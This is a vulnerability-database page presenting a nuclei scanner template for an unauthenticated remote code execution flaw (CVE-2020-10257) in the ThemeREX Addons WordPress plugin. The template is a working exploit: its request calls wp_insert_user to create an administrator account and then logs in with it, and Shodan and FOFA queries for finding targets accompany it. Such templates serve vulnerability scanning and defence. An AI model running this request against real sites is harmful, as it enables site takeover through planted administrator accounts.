Lucene search
K

ThemeREX Addons - Remote Code Execution

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 35 Views

ThemeREX Addons for WordPress allows unauthenticated remote code execution via a REST endpoint.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2020-10257
22 Oct 202521:02
circl
CNVD
ThemeREX Addons Remote Code Execution Vulnerability
10 Mar 202000:00
cnvd
CVE
CVE-2020-10257
9 Mar 202023:41
cve
Cvelist
CVE-2020-10257
9 Mar 202023:41
cvelist
EUVD
EUVD-2020-2712
7 Oct 202500:30
euvd
NVD
CVE-2020-10257
10 Mar 202000:15
nvd
Patchstack
WordPress Ozeum premium theme <= 1.0.1 - Remote Code Execution (RCE) vulnerability
18 Feb 202000:00
patchstack
Patchstack
WordPress Yottis premium theme <= 1.0 - Remote Code Execution (RCE) vulnerability
18 Feb 202000:00
patchstack
Patchstack
WordPress Chit Club premium theme <= 1.0 - Remote Code Execution (RCE) vulnerability
18 Feb 202000:00
patchstack
Prion
Design/Logic Flaw
10 Mar 202000:15
prion
Rows per page
id: CVE-2020-10257

info:
  name: ThemeREX Addons - Remote Code Execution
  author: theamanrawat
  severity: critical
  description: |
    ThemeREX Addons plugin before 2020-03-09 for WordPress contains an access control vulnerability in the /trx_addons/v2/get/sc_layout REST API endpoint, allowing any users to execute PHP functions because includes/plugin.rest-api.php calls trx_addons_rest_get_sc_layout with an unsafe sc parameter, letting attackers execute arbitrary PHP functions, exploit requires no authentication.
  impact: |
    Unauthenticated attackers can execute arbitrary PHP functions, potentially leading to remote code execution and full site compromise.
  remediation: |
    Update to version 2020-03-09 or later to fix access control issues.
  reference:
    - https://www.wordfence.com/blog/2020/03/zero-day-vulnerability-in-themerex-addons-now-patched/
    - https://wpscan.com/vulnerability/4ed4e60e-5bbb-4010-a7fe-40eadd8dee64/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-10257
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-10257
    epss-score: 0.08877
    epss-percentile: 0.94593
    cwe-id: CWE-94
    cpe: cpe:2.3:a:themerex:addons:1.70.3:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    product: themerex
    framework: wordpress
    shodan-query: 'http.html:trx_addons'
    fofa-query: 'body=trx_addons'
  tags: cve,cve2020,rce,wordpress,wp-plugin,wp,themerex,unauth,vkev

variables:
  username: '{{rand_text_alpha(6)}}'
  password: '{{rand_text_alpha(6)}}'

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-json/trx_addons/v2/get/sc_layout?sc=wp_insert_user&role=administrator&user_login={{username}}&user_pass={{password}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{\"data\":")'
          - 'status_code==200'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'status_code==302'
          - 'contains(header, "wordpress_logged_in")'
        condition: and
# digest: 4a0a00473045022100d150cfe88709546cd46ff16b33fc647e03df4cfaaee471856e03b6f195a2d68102207bbff332b8628bf37bdd6531096407a6d7ab9515ee19820e4eb533df2306f018:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 27.5
CVSS 3.19.8
CVSS 39.8
EPSS0.08877
35